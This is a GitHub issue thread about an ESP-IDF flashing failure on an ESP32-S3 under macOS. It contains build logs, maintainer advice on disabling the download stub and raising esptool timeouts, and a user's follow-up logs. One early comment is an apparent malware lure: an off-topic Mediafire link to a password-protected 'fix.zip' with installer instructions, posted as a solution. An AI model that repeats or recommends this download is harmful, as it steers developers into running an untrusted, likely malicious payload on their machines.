espressif/esp-idf #14447: CMake Error at run_serial_tool.cmake:66 when attempting to flash hello_world

phesterman, 2024-08-26:
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### IDF version.

5.3

### Operating System used.

macOS

### How did you build your project?

Command line with idf.py

### If you are using Windows, please specify command line type.

None

### What is the expected behavior?

I expected to build and flash the hello_world example to my ESP32-S3_DevKitC-1.

### What is the actual behavior?

Uploading stub...

A fatal error occurred: Failed to write to target RAM (result was 01070000: Operation timed out)
CMake Error at run_serial_tool.cmake:66

### Steps to reproduce.

I followed all of the directions step-by-step in the ESP-IDF Programming Guide.

### Build or installation Logs.

```plain
peterhesterman@PetersMacStudio hello_world % idf.py flash
Executing action: flash
Serial port /dev/cu.usbmodem58960425671
Connecting....
Detecting chip type... ESP32-S3
Running ninja in directory /Users/peterhesterman/esp/hello_world/build
Executing "ninja flash"...
[4/1007] Generating ../../partition_table/partition-table.bin
Partition table binary generated. Contents:
*******************************************************************************
# ESP-IDF Partition Table
# Name, Type, SubType, Offset, Size, Flags
nvs,data,nvs,0x9000,24K,
phy_init,data,phy,0xf000,4K,
factory,app,factory,0x10000,1M,
*******************************************************************************
[998/1007] Performing configure step for 'bootloader'
-- Found Git: /usr/bin/git (found version "2.39.3 (Apple Git-146)")
-- The C compiler identification is GNU 13.2.0
-- The CXX compiler identification is GNU 13.2.0
-- The ASM compiler identification is GNU
-- Found assembler: /Users/peterhesterman/.espressif/tools/xtensa-esp-elf/esp-13.2.0_20240530/xtensa-esp-elf/bin/xtensa-esp32s3-elf-gcc
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check for working C compiler: /Users/peterhesterman/.espressif/tools/xtensa-esp-elf/esp-13.2.0_20240530/xtensa-esp-elf/bin/xtensa-esp32s3-elf-gcc - skipped
-- Detecting C compile features
-- Detecting C compile features - done
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Check for working CXX compiler: /Users/peterhesterman/.espressif/tools/xtensa-esp-elf/esp-13.2.0_20240530/xtensa-esp-elf/bin/xtensa-esp32s3-elf-g++ - skipped
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Building ESP-IDF components for target esp32s3
-- Project sdkconfig file /Users/peterhesterman/esp/hello_world/sdkconfig
-- Compiler supported targets: xtensa-esp-elf
-- Adding linker script /Users/peterhesterman/esp/esp-idf/components/soc/esp32s3/ld/esp32s3.peripherals.ld
-- Bootloader project name: "bootloader" version: 1
-- Adding linker script /Users/peterhesterman/esp/esp-idf/components/esp_rom/esp32s3/ld/esp32s3.rom.ld
-- Adding linker script /Users/peterhesterman/esp/esp-idf/components/esp_rom/esp32s3/ld/esp32s3.rom.api.ld
-- Adding linker script /Users/peterhesterman/esp/esp-idf/components/esp_rom/esp32s3/ld/esp32s3.rom.libgcc.ld
-- Adding linker script /Users/peterhesterman/esp/esp-idf/components/esp_rom/esp32s3/ld/esp32s3.rom.wdt.ld
-- Adding linker script /Users/peterhesterman/esp/esp-idf/components/esp_rom/esp32s3/ld/esp32s3.rom.version.ld
-- Adding linker script /Users/peterhesterman/esp/esp-idf/components/esp_rom/esp32s3/ld/esp32s3.rom.newlib.ld
-- Adding linker script /Users/peterhesterman/esp/esp-idf/components/bootloader/subproject/main/ld/esp32s3/bootloader.ld
-- Adding linker script /Users/peterhesterman/esp/esp-idf/components/bootloader/subproject/main/ld/esp32s3/bootloader.rom.ld
-- Components: bootloader bootloader_support efuse esp_app_format esp_bootloader_format esp_common esp_hw_support esp_rom esp_system esptool_py freertos hal log main micro-ecc newlib partition_table soc spi_flash xtensa
-- Component paths: /Users/peterhesterman/esp/esp-idf/components/bootloader /Users/peterhesterman/esp/esp-idf/components/bootloader_support /Users/peterhesterman/esp/esp-idf/components/efuse /Users/peterhesterman/esp/esp-idf/components/esp_app_format /Users/peterhesterman/esp/esp-idf/components/esp_bootloader_format /Users/peterhesterman/esp/esp-idf/components/esp_common /Users/peterhesterman/esp/esp-idf/components/esp_hw_support /Users/peterhesterman/esp/esp-idf/components/esp_rom /Users/peterhesterman/esp/esp-idf/components/esp_system /Users/peterhesterman/esp/esp-idf/components/esptool_py /Users/peterhesterman/esp/esp-idf/components/freertos /Users/peterhesterman/esp/esp-idf/components/hal /Users/peterhesterman/esp/esp-idf/components/log /Users/peterhesterman/esp/esp-idf/components/bootloader/subproject/main /Users/peterhesterman/esp/esp-idf/components/bootloader/subproject/components/micro-ecc /Users/peterhesterman/esp/esp-idf/components/newlib /Users/peterhesterman/esp/esp-idf/components/partition_table /Users/peterhesterman/esp/esp-idf/components/soc /Users/peterhesterman/esp/esp-idf/components/spi_flash /Users/peterhesterman/esp/esp-idf/components/xtensa
-- Configuring done (3.0s)
-- Generating done (0.0s)
-- Build files have been written to: /Users/peterhesterman/esp/hello_world/build/bootloader
[112/113] Generating binary image from built executable
esptool.py v4.8.dev5
Creating esp32s3 image...
Merged 2 ELF sections
Successfully created esp32s3 image.
Generated /Users/peterhesterman/esp/hello_world/build/bootloader/bootloader.bin
[113/113] cd /Users/peterhesterman/esp..._world/build/bootloader/bootloader.bin
Bootloader binary size 0x5260 bytes. 0x2da0 bytes (36%) free.
[1005/1007] Generating binary image from built executable
esptool.py v4.8.dev5
Creating esp32s3 image...
Merged 2 ELF sections
Successfully created esp32s3 image.
Generated /Users/peterhesterman/esp/hello_world/build/hello_world.bin
[1006/1007] cd /Users/peterhesterman/e.../esp/hello_world/build/hello_world.bin
hello_world.bin binary size 0x32950 bytes. Smallest app partition is 0x100000 bytes. 0xcd6b0 bytes (80%) free.
[1006/1007] cd /Users/peterhesterman/e...nents/esptool_py/run_serial_tool.cmake
esptool.py --chip esp32s3 -p /dev/cu.usbmodem58960425671 -b 460800 --before=default_reset --after=hard_reset write_flash --flash_mode dio --flash_freq 80m --flash_size 2MB 0x0 bootloader/bootloader.bin 0x10000 hello_world.bin 0x8000 partition_table/partition-table.bin
esptool.py v4.8.dev5
Serial port /dev/cu.usbmodem58960425671
Connecting....
Chip is ESP32-S3 (QFN56) (revision v0.2)
Features: WiFi, BLE, Embedded PSRAM 8MB (AP_3v3)
Crystal is 40MHz
MAC: 48:ca:43:9b:45:a8
Uploading stub...

A fatal error occurred: Failed to write to target RAM (result was 01070000: Operation timed out)
CMake Error at run_serial_tool.cmake:66 (message):
  
  /Users/peterhesterman/.espressif/python_env/idf5.3_py3.12_env/bin/python;;/Users/peterhesterman/esp/esp-idf/components/esptool_py/esptool/esptool.py;--chip;esp32s3
  failed.

FAILED: CMakeFiles/flash /Users/peterhesterman/esp/hello_world/build/CMakeFiles/flash 
cd /Users/peterhesterman/esp/esp-idf/components/esptool_py && /opt/homebrew/Cellar/cmake/3.30.2/bin/cmake -D IDF_PATH=/Users/peterhesterman/esp/esp-idf -D "SERIAL_TOOL=/Users/peterhesterman/.espressif/python_env/idf5.3_py3.12_env/bin/python;;/Users/peterhesterman/esp/esp-idf/components/esptool_py/esptool/esptool.py;--chip;esp32s3" -D "SERIAL_TOOL_ARGS=--before=default_reset;--after=hard_reset;write_flash;@flash_args" -D WORKING_DIRECTORY=/Users/peterhesterman/esp/hello_world/build -P /Users/peterhesterman/esp/esp-idf/components/esptool_py/run_serial_tool.cmake
ninja: build stopped: subcommand failed.
ninja failed with exit code 1, output of the command is in the /Users/peterhesterman/esp/hello_world/build/log/idf_py_stderr_output_14106 and /Users/peterhesterman/esp/hello_world/build/log/idf_py_stdout_output_14106
```

### More Information.

I am using Terminal in MacOS 14.6.1 on an M1 Mac Studio.  I've tried to flash two ESP32-S3s and have had the same result with both.  I've tried specifying the port when flashing, but that didn't make a difference either.  I also tried IDF 5.4.

I did look at other reports of similar errors, but they all seem to be left unresolved.

JONTY650413, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

phesterman, 2024-08-26:
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Thanks for the reply.  Is there a way to apply this fix on a Mac?

radimkarnis, 2024-08-27:
Hello @phesterman,
It seems esptool (the flashing utility) fails when a stub is being uploaded to the RAM.
Can you try disabling the flasher stub in menuconfig? `Serial flasher config` -> `Disable download stub`

Another thing to try is to use a [configuration file](https://docs.espressif.com/projects/esptool/en/latest/esp32/esptool/configuration-file.html) and increase the timeouts used by esptool.

Let me know if that helped!

phesterman, 2024-08-27:
And here with no stub, but with timeout = 3.5 and serial_write_timeout = 10.5 (didn't seem to make any difference):

Successfully created esp32s3 image.
Generated /Users/peterhesterman/esp/hello_world/build/bootloader/bootloader.bin
[113/113] cd /Users/peterhesterman/esp/hell...hello_world/build/bootloader/bootloader.bin
Bootloader binary size 0x5260 bytes. 0x2da0 bytes (36%) free.
[1005/1008] Generating binary image from built executable
esptool.py v4.8.dev5
Creating esp32s3 image...
Merged 2 ELF sections
Successfully created esp32s3 image.
Generated /Users/peterhesterman/esp/hello_world/build/hello_world.bin
[1006/1008] cd /Users/peterhesterman/esp/he...erman/esp/hello_world/build/hello_world.bin
hello_world.bin binary size 0x32950 bytes. Smallest app partition is 0x100000 bytes. 0xcd6b0 bytes (80%) free.
[1006/1008] cd /Users/peterhesterman/esp/es...components/esptool_py/run_serial_tool.cmake
esptool.py --chip esp32s3 -p /dev/cu.usbmodem58960425671 -b 460800 --before=default_reset --after=hard_reset --no-stub write_flash --flash_mode dio --flash_freq 80m --flash_size 2MB 0x0 bootloader/bootloader.bin 0x10000 hello_world.bin 0x8000 partition_table/partition-table.bin
esptool.py v4.8.dev5
Serial port /dev/cu.usbmodem58960425671
Connecting....
Chip is ESP32-S3 (QFN56) (revision v0.2)
Features: WiFi, BLE, Embedded PSRAM 8MB (AP_3v3)
Crystal is 40MHz
MAC: 48:ca:43:9b:45:a8
Changing baud rate to 460800
Changed.
Enabling default SPI flash mode...
Configuring flash size...
Flash will be erased from 0x00000000 to 0x00005fff...
Flash will be erased from 0x00010000 to 0x00042fff...
Flash will be erased from 0x00008000 to 0x00008fff...
Erasing flash...
SHA digest in image updated
Took 0.18s to erase flash block
Writing at 0x00000000... (4 %)

A fatal error occurred: Failed to write to target Flash after seq 0 (result was 01050000: Requested resource not found)
CMake Error at run_serial_tool.cmake:66 (message):
  
  /Users/peterhesterman/.espressif/python_env/idf5.3_py3.12_env/bin/python;;/Users/peterhesterman/esp/esp-idf/components/esptool_py/esptool/esptool.py;--chip;esp32s3
  failed.

FAILED: CMakeFiles/flash /Users/peterhesterman/esp/hello_world/build/CMakeFiles/flash 
cd /Users/peterhesterman/esp/esp-idf/components/esptool_py && /opt/homebrew/Cellar/cmake/3.30.2/bin/cmake -D IDF_PATH=/Users/peterhesterman/esp/esp-idf -D "SERIAL_TOOL=/Users/peterhesterman/.espressif/python_env/idf5.3_py3.12_env/bin/python;;/Users/peterhesterman/esp/esp-idf/components/esptool_py/esptool/esptool.py;--chip;esp32s3" -D "SERIAL_TOOL_ARGS=--before=default_reset;--after=hard_reset;--no-stub;write_flash;@flash_args" -D WORKING_DIRECTORY=/Users/peterhesterman/esp/hello_world/build -P /Users/peterhesterman/esp/esp-idf/components/esptool_py/run_serial_tool.cmake
ninja: build stopped: subcommand failed.
ninja failed with exit code 1, output of the command is in the /Users/peterhesterman/esp/hello_world/build/log/idf_py_stderr_output_42857 and /Users/peterhesterman/esp/hello_world/build/log/idf_py_stdout_output_42857

phesterman, 2024-08-27:
I also tried with the stub and the increased timeouts (first by 0.5 and then 1.0 second each).  Still got:  Failed to write to target RAM (result was 01070000: Operation timed out).

closed 2024-08-27 by phesterman